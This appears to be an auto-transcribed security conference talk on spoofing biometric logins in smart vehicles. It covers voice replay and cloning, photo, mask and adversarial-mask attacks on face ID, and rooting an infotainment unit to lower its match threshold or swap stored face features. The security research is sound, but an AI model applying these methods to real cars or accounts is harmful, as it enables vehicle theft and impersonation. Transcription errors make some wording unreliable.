 Hi, guys. Thanks for attending our talk. We're going to talk about biometric system hacking in the age of smart vehicle. So who are we? I'm Kevin 2600 and this is my teammate, Wesley. Okay. So we are a secure researchers from a study lab, and we have researched and found many interesting vehicle related box and presented and some of them at Defcon in the past few years. And if anyone wonder what car hackers lab looks like, and here are some picture for you. Okay. Just like any other labs, we got lots of interesting equipments. And most importantly, we got actual cars to play with. So, okay, so here are the contents for today's talk. We are going to talk about biometric authentication and then facial recognition spoofing and then speaking a speaker recognition spoofing for the vehicles. Okay, so biometric authentication. And this is a definition of multi factor authentication. Basically, you will need to need, you will need two or more factors like something you are and something you have and something you know to achieve the syndication. So something you have. Usually, this means our key fob for the cars. The key fob is a very common device we have for the vehicle. And in the recent time, some car company start to replace the physical key fobs with the NFC car or just a mobile phone to access the car. For example, this is a key fob system for Tesla. In the beginning, Tesla only provides the NFC car and mobile app to access the vehicle. But later, Tesla has provided the physical key fob, but still it based on BLE and NFC. Okay, something you know. Now, interestingly, some car company like Ford, they provided a feature that we can unlock the door with a pin code. So we need to something to always remember this. Right. And something you are. Again, some model for not only using pin codes to unlock the door, it has also provided a fingerprint reader. That means we can point our finger at it and to unlock our car. Right. And some company use a face ID for access to the vehicle has become a new trend too. And also, the car companies like BMW and Honda prefer to use our human voice print and integrate with a smart speaker to control the cars like Honda here and with the Alexa. Okay. Let's move from how do we do a speaker recognition spoofing. So the definition of speaker recognition is the identification of person from characteristics of voice. It can be used to authenticate or verify identity of a speaker as part of security process. And this definition I took from Wikipedia. The development, the history of speaker recognition can be traced all the way back to 60s. The speaker recognition algorithm has started with a template matching and then move on to probability model at GMM and GMM UBM and the feature classification like the defective vector and X vectors and so on. So the speaker recognition system generally consists two categories like feature extraction and a feature matching and in reality. The extracted features are matched with features of people registered in the database and then the identity is determined based on similarity of these two features. For the content to be recognized, the speaker recognition system is generally divided into three categories. The first one is a fixed vocabulary recognition. It means voice print recognition through fixed vocabulary such as a theory. The second one is fixed voice plus random content recognition. It means the fixed random contents combined together such as a bug to 600 and to 600 is generated randomly by the system. And finally, the random contents recognition is entire phrase is generated randomly by the system. Now, as you can see, the speaker recognition system are already everywhere from exact control system in the voice assistant in the car. But what could possibly go wrong then? Here we list some of the most common spoofing methods for speaker recognition. Yes, the one is called an impersonation attack. The attacker tries to impersonate the victim's speaking tone to disable the target system but this attack can be easily detected by the speaker recognition system. And there are more effective and once it attacks, call it a replay attack, speech synthesis, voice conversion, and adversarial example attack. We are going to talk about those attacks in more detail to the leader. Now, let's talk about the replay attack is mainly aimed at the system of fixed sentence verification. We can use the recording device to record the fixed sentence of the victims and replay the recorded sentence during verification to disable the speaker recognition system. As we can see from a male spectrogram, the similarity from replay the voice compared to genuine voice is high. This is why the replay attack is very simple. Yes, very effective attack. However, this simple method may not pass the speaker authentication system with the voice anti spoofing. Now, let's see some demos. There are already plenty of third party apps can control smart cars like Tesla using Siri. This is a video demo for the replay attack on Siri. And because some of the magazines like Unlockable Bureau needs authentication like pin codes for this app, we can only open the charge port with it. Yeah, the door currently is locked. And then, yeah, the port is open. However, we have found at least one app that doesn't need access to authentication and we can unlock the Tesla very easily. No. Oh, sorry. Ask Tesla to unlock it. Yep, it works. Now let's take a look at the speech synthesis text to speech aggressor. Let's take Google's Sv2 TTS as an example. The entire speech synthesis can be divided into three parts. The speaker encoder module is responsible for extracting, extracting speaker features from short sentences. The synthesizer module is responsible for combining the speaker feature with text to generate a male spectral grant that integrates the specified speaker features into the speech corresponding to the specified text. The encoder module is responsible for generating voice data with male spectral grant, which is audio data we use for TTS attack. And for the speech synthesis environment, we use the software called it Mockingbird under real-time voice cloning. And it is based on algorithm Sv2 TTS, which opens source by Google. In fact, the situation, it can close voice in just five seconds to generate the absolute speech in real-time. And this is a demo for the speech synthesis attack. The first demo is to attack the battle smarter speaker. The battle smarter speaker has ideal anti-spoothing enabled. But we can use TTS to support it and impersonate it as other people. And the second demo is to attack the TMO speaker. It can also be supported by TTS attack. We can go even further by impersonating someone else to purchase something online. So this is a fixed vocabulary plus a random conference. So without modification, we cannot bypass the system. So now we're using Mockingbird to generate this random number and replay to the TMO speaker. And we try to find the right angle for the speaker. As you can see, we may try a couple of times in order to get it to work. So we actually successfully attacked. And Rosario example attack means an attacker has intentionally used anger to cast a machine learning model to make a mistake. First speaker, vaccination-proofing attack. The main goal is to attack the speaker, vaccination algorithm. Adding some perturbation that has been calculated to the switch data to make the switch be recognized as a genuine victim to disable the authentication system. This is one of the books, an agreement for switch recognition-proofing attack on an open-source project called the DeepSwitch. We first play a genuine recording, and it can be recognized successfully. Then we played the correct recording, the DeepSwitch translated differently. That means our attack is successful. So let's summarize our soothing methods for speaker recognition. As we can see, the fixed vocabulary is the easiest one to attack. Simple replay will work just fine. And for the vendor contents, we still can use speech synthesis or adversarial example to attack. Okay, time to move on to facial recognition spoofing. The facial recognition is a technology capable to matching a human face from a digital image or video frame against a database of faces. Usually it can be used for a syndicate user through ID verification servers. And the facial recognition technology is constantly involving. It was based on a low-dimension characterization, and then nowadays it has involved a three-dimension face recognition. And there are already many applications implemented the face recognition. For example, face ID to unlock our mobile phone and iPhone. And boarding the plan in the airport. And operationally, the company has started to use face recognition technology for driver monitoring system. And also use face ID for driver profile to improve the driving experience. And of course, use the human face to syndicate the owner of a vehicle is indeed a very convenient way. And here are the four stages of face recognition procedure. The first one is face detection. So basically the system need to know if there's a human face or cat face. And second is a life needs detection, aka face aunties spoofing. This stage play a very important role in the face recognition procedure. And third and fourth is a feature instruction and a feature matching. And at this stage, the system will try to match the face features from the database. And let's take a close look at a face recognition procedure. But this time we saw auntie face spoofing. First, the input data is the image. The system need to determine whether it's a human face. Once the system spot a human face, it will try to extract the features from this particular human face. And the final step, the system will match the face features to see if it's in the database. And next, let's talk about more about face aunties spoofing. As we mentioned, this stage play a very important role in the face recognition procedure. Usually we need to do some action like open our mouth or shake our head for the system to determine whether the human face it presented is a real human being or just piece of paper. In addition, the system can do a silent face auntie spoofing, which means no human action required. You will determine based on the things like human skin texture or different frequency of motion and so on. And this is a face recognition structure from the diagram that we can see. There are many other entry point to attack. For example, later in the talk, we're going to share more real life cases such as trash, hold value and feature value attack. So what could possibly go wrong? So here we have listed the six most common methods to spoof the facial recognition system. For example, the photo attack and more advanced attack like adverse serial example attack. We're going to talk about this attacks in more details next. So this is the face photo attack. We can print wet and written photo on a piece of paper. And as you can see, it's very easy to do. Even kids can do it, right? See, they are very happy. And this is what we call Mr. Orange attack. Basically, we draw a human face on an orange. And in order to test the target system face detection function. And as we mentioned, human face detection is the first stage of every face recognition system. Simply draw a human face orange. We easily spoof the facial recognition system when the system does not have good face auntie spoofing mechanism. So our first target of smart lock from Xiaomi. Let's play the video first. Okay. As we can see from the video recording, when we presented an orange to lock, you will not just detect it as a real human, even, but even think this guy is 24 years old. And we also test the show me lock with a face photo attack and adversarial example attack. And as we can see, every tricks will work. The picture from the left is a real human victim and show me lock has detected correctly. But when we presented a face photo, which is the one in the middle. And the adversarial example mask is the one here. It will also detect it as the same victim. So that all works. But this type of attack can be easily prevented because some more advanced system, you will come with the infrared camera. And this is what it looks like from a facial recognition system point of view. As we can see, if we presented a human face photo or video on a mobile, see like one here on the right to the infrared camera, you actually see nothing at all. Usually we need to do some action like open our mouse or shake the head for the face on this booth assistant to determine whether the face presented is a real human being or not. But what we can do is cut the holes in the eyes or mouth area to bypass the detection. And we even can buy a customized face sculpture to bypass the system which lacks detection on a human skin texture. So here's the video demo for the face sculpture tag on Huawei P30 Pro. So it's working. As we mentioned early on, the principle of adversarial example attack is an attacker as intentionally designed to cast a machine learning model to make a mistake. As we can see, when we add a small perturbation to the under picture, the machine learning model will have 99.3% confidence to think it is even this time. And this is a classic adversarial example attack. And based on various characteristics, adversarial example can be divided into three different attack methods such as without target, white box or black box attack. And one step of multi-step attack. We mainly use the black box adversarial example attack method for testing. The transferability of adversarial example is guaranteed by joint training of multiple models. The normal model training process is to try the parameters of the model of the data set, fixed data set. The adversarial example is training the sample under the condition of fixed parameters, which continuously makes the output of the model close to our expectations. For the basin area, selection has a big impact on the attack without we can add it. We can add for the basin in different areas on the face. But based on a research article from Tsinghua University, the basin area within the ice and the north has a Paris success rate. So once we made a adversarial example face mask, we can present to some online face ID algorithm for testing. One interesting factor is even we use the same mask because the human face skin and shape are different. One person may have more success rate than the others as if the picture shows only 73% similarity and the picture on the right have 89%. Okay, so this is a video demo for the adversarial example attack on Huawei P30 Pro face ID login system. So first, this is the real person. It can be logged in successfully. Now the attacker is coming. See, it doesn't work at the first time. And then he starts wearing an adversarial example mask straight in. And this is a video demo for the adversarial example attack on Wiimap vehicle face ID system. So again, without a mask, it doesn't work. So now we start wearing a modified mask. Let's try again. And this is another video, the demo, but the target is a car which we cannot disclose the name. But this car actually allows us to turn on the engine and drive off if we bypass the face ID system. So it's kind of scary if we can bypass it with the adversarial sample mask. So we need to continue. You see them? We continue to try. And yeah, eventually it works. So now we have the clear idea of principle of adversarial attack is we can add a small perturbation to cause the machine learning model to make a mistake. And during the research, we have found by putting a target face image on the attacker's face, it can cover attack face partially and we can deceive some of face recognition system with a higher successful rate. And this is a common limitation for 2D face recognition system. So this is a video demo for a future face attack. And we test it on Xiaomi Note 9. So without a mask, it won't work. Then I will gonna wear this special mask. Always works all the time. Well, of course, when system center rule so tight and like very high threshold value, we won't able to bypass it easily. And this one is a face ID system for banking login system, which we were failed to get in with good for them and for us, right? And so the threshold value. This is car we were pen tested before, which we cannot disclose the name. But just like the last smart car, it has an Android based IVI, which we were able to get in in the engineer mode. And then we once we're in the engineer mode, we're able to enable the adb connection. And once we got adb cell, we are ruled straight away. So what would you do when you got rules on IVI? Maybe replace a new screen picture maybe, right? See? Pretty cool. So and this car also gets a face ID function. However, the artificial spoofing is so tight, so good. So we cannot spoof it with the tricks we were just mentioned above. But we are roots on a system. Remember, turns out the threshold value configure file is stored locally on IVI. So we can actually modify it to a very low value in order to bypass it, right? So here's the video demo for the attack. So first, we saw modify the threshold value and when we try to log in, it failed. Try again. Yeah, it won't work. So then we start to do some magic, like by changing the threshold value. And once we change it, we need to reboot IVI system in order to get it working. So once the system isn't rebooted itself, we can go in to try it again. So see if it works. So now system rebooted. Okay. So let's try it again. You can see the system. Yeah, it's working. See, sinking, sinking, sinking. Similarly, this is a face ID system we have come across during the nanopentest ops. But this system has two human features stored in the database. Once we got root in the system, we can replace one feature for our own. And then the system will verify any one of them for logging in successfully, which means we can log in as a victims. Well, victims still able to log in as themselves, which means nobody will even know where we're there. Okay. Now, what if we cannot get a cell on a target and then the rules of face ID is so tight? And are we out of the option yet? Let's take a look. See. The door is open. So yeah, a simple RF replay attack will work because those access control systems usually have multiple features enabled. So it turns out our target can also be opened by a fixed code radio remote controller. Just like people said, it's not a bug. It's a feature. Okay. Let's summarize some of the techniques we have seen so far. For the face detection, it can be spoofed by a Mr. Orange attack, face photo attack and face sculpture attack. And for the face undisputing, the feature replace attack and the serial sample attack will work. And for the future matching feature value attack and threshold value attack is always a trick we can always try. So in the end, let's not forget those extra function attack by using the hacker or something to replay, right? Okay. Here are some references if anyone like to know more. And see we can, for the research, we have done a lot of readings, right? Yeah, I think that's it. Thank you.